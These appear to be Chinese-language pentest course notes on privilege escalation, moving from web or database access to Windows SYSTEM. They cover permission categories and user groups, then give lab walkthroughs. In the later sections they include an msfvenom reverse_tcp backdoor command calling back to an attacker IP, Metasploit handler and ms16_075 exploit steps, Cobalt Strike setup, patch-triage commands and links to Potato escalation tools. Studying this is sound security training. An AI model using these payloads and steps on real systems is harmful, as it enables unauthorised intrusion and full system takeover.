#基础点:
0、为什么我们要学习权限提升转移技术:
简单来说就是达到目的过程中需要用到它 心里要想着我是谁 我在哪 我要去哪里
1、具体有哪些权限需要我们了解掌握的:
后台权限,数据库权限,Web权限,用户权限,服务器权限,宿主机权限,域控制器权限
2、以上常见权限获取方法简要归类说明:
后台权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成
数据库权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成
Web权限:RCE,反序列化,文件上传等直达或通过后台数据库间接造成
用户权限:弱口令,数据泄漏等直达或通过Web,服务器及域控转移造成
服务器权限:系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成
宿主机权限:Docker不安全配置或漏洞权限提升直达(服务资产造成入口后提升)
域控制器权限:内网域计算机用户提升或自身内核漏洞,后门攻击,主机软件安全直达
3、以上常见权限获取后能操作的具体事情:
后台权限:文章管理,站点管理,模版管理,数据管理,上传管理等
数据库权限:操作数据库的权限,数据增删改查等(以数据库用户为主)
Web权限:源码查看,源码文件增删改查,磁盘文件文件夹查看(以权限配置为主)
用户权限:就如同自己电脑上普通用户能操作的情况(敏感操作会被禁止)
服务器权限:就如同自己电脑上能操作的情况(整个系统都是你的)
宿主机权限:就如同自己电脑上能操作的情况(整个系统都是你的)
域控制器权限:就如同自己电脑上能操作的情况(整个内网域系统都是你的)
4、以上常见权限在实战中的应用场景介绍:
当我们通过弱口令进入到应用后台管理
当我们下载备份文件获取到数据库信息
当我们通过漏洞拿到资产系统的Web权限
当我们在公司被给予账号密码登录计算机或系统
当我们在公司或钓鱼后门获取到某个公司机器系统
#权限提升-Web应用&中间件&数据库
背景1:通过弱口令进入Web后台系统通过上传获取Web权限
背景2:通过Tomcat弱口令进入控制界面通过上传获取Web权限
背景3:通过Redis未授权进入管理端通过SQL执行获取Web权限
#权限转移-后台管理&数据库管理&Web
Tmall-后台权限->Web权限(提升)
Tmall-Web权限->数据库权限(转移)
Tmall-Web权限->另一个后台权限(转移)
PhpMyadmin-数据管理->Web权限(提升)
PhpMyadmin-Web权限->另一个后台权限(转移)
#Web到Win系统提权-平台&语言&用户
1、Web搭建平台差异
集成软件,自行搭建,虚拟化等
集成软件:宝塔,PhpStudy,XAMMP等
自行搭建:自己一个个下载安装搭建配置
虚拟化:Docker,ESXi,QEMU,Hyper-V等
集成软件大多获得权限后直接就是高权限 除了宝塔有自己的安全策略
自行搭建的不会出先拿到权限后就是高权限的情况
虚拟化需要先逃逸
2、Web语言权限差异
ASP/ASP.NET/PHP/JSP等
权限高低:JSP>ASP.NET>ASP=PHP
JSP的拿到权限后就是高权限不需要再提权 其他语言都需要再提(前提是自行搭建的 如果是集成软件的都不需要再提权了)
原因:语言特性
3、系统用户权限差异
Windows:
System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。
Administrators:管理员组,具有对计算机进行完全访问和操作的权限。
Users:用户组,一般用户的默认组别,拥有较低的系统权限。
Guests:
访客组,可以访问计算机上的公共文件夹和打印机,但不能更改配置和安装程序。
Backup Operators:
备份操作员组,允许用户备份和还原数据,但不能更改配置安装程序。
Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。
Remote Desktop Users:远程桌面用户组,允许用户进行远程桌面连接。
Network Configuration Operators:网络配置操作员组,允许用户管理网络配置。
Performance Log Users:性能日志用户组,允许用户收集性能日志和计数器数据。
Distributed COM Users:
分布式 COM 用户组,允许用户使用分布式 COM 连接到计算机。
IIS_IUSRS: 用于授权IIS相关服务的用户组。
Windows 权限大概分为四个基本
System是最高权限Administrators其次,再下面就是User,组权限最底的是特殊组如Remote Desktop Users 这种,ASP/ASP.NET/PHP获得的权限就是IIS_IUSRS这个组的。
Linux:
系统用户:UID(0-999)
普通用户:UID(1000-*)
root用户:UID为0,拥有系统的完全控制权限
#Web到Win-系统提权-宝塔面板-哥斯拉
Windows 2012(宝塔Apache+PHP)-MSF
复现搭建:选择2012系统后自行安装宝塔
PMeterpreter
BypassOpenBaseDir
BypassDisableFunction
#Web到Win-系统提权-溢出漏洞-MSF&CS
Windows 2008(IIS+ASP)-MSF
自行搭建+ASP/PHP+Windows 2008
复现搭建:选择2016系统后自行安装IIS+ASP
0、MSF安装:(也可以用kali)
目前的msf版本有bug可以TB上购买pro版本嘎嘎稳
https://blog.csdn.net/qq_46717339/article/details/122653084
1、生成反弹后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.141 LPORT=3333 -f exe -o msf.exe
2、配置监听会话
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
exploit
2.1、筛选EXP模块
全自动:快速识别系统中可能被利用的漏洞
use post/multi/recon/local_exploit_suggester
set showdescription true
3、利用EXP溢出提权
background
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
exploit
Windows 2016(IIS+ASP.NET)-CS
复现搭建:选择2016系统后自行安装IIS+ASP.NET
0、CS安装
chmod +x ./teamserver
chmod +x ./TeamServerImage
./teamserver IP password
1、连接CS
2、创建监听器
3、加载脚本插件
#Web到Win-系统提权-人工操作
如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用
优点:解决实时更新不集成的EXP
缺点:操作繁琐,需要各种复现调试
解决工具或插件无法实时更新,又或者集成较少面对复杂情况下人工操作更适合
1、信息收集
参考常见命令(见上图)
2、补丁筛选
https://i.hacking8.com/tiquan
https://github.com/bitsadmin/wesng
python wes.py systeminfo.txt --color
python wes.py systeminfo.txt --color -i "Elevation of Privilege"
3、EXP获取执行
KernelHub 针对常用溢出编号指定找EXP
Poc-in-Github 针对年份及编号指定找EXP
exploitdb 针对类型及关键说明指定找EXP
https://github.com/Ascotbe/Kernelhub
https://github.com/nomi-sec/PoC-in-GitHub
https://gitlab.com/exploit-database/exploitdb
#Web到Win-系统提权-土豆家族
https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w
土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,
可以将低权限的服务用户提升为“NT AUTHORITY\SYSTEM”特权。
1、Test in:Windows 10/11(1809/21H2)
2、Test in:Windows Server 2019 Datacenter(1809)
3、Test in:Windows Server 2022 Datacenter(21H2)
土豆家族
SweetPotato OK
RoguePotato
BadPotato OK
EfsPotato OK
GodPotato OK
PetitPotato OK
MultiPotato
CandyPotato
RasmanPotato OK
CoercedPotato
JuicyPotatoNG
PrintNotifyPotato OK
GodPotato
https://github.com/BeichenDream/GodPotato
SweetPotato
https://github.com/CCob/SweetPotato
RoguePotato
https://github.com/antonioCoco/RoguePotato
BadPotato
https://github.com/BeichenDream/BadPotato
EfsPotato
https://github.com/zcgonvh/EfsPotato
MultiPotato
https://github.com/S3cur3Th1sSh1t/MultiPotato
CandyPotato
https://github.com/klezVirus/CandyPotato
RasmanPotato
https://github.com/crisprss/RasmanPotato
PetitPotato
https://github.com/wh0amitz/PetitPotato
JuicyPotatoNG
https://github.com/antonioCoco/JuicyPotatoNG
PrintNotifyPotato
https://github.com/BeichenDream/PrintNotifyPotato
CoercedPotato
https://github.com/Prepouce/CoercedPotato
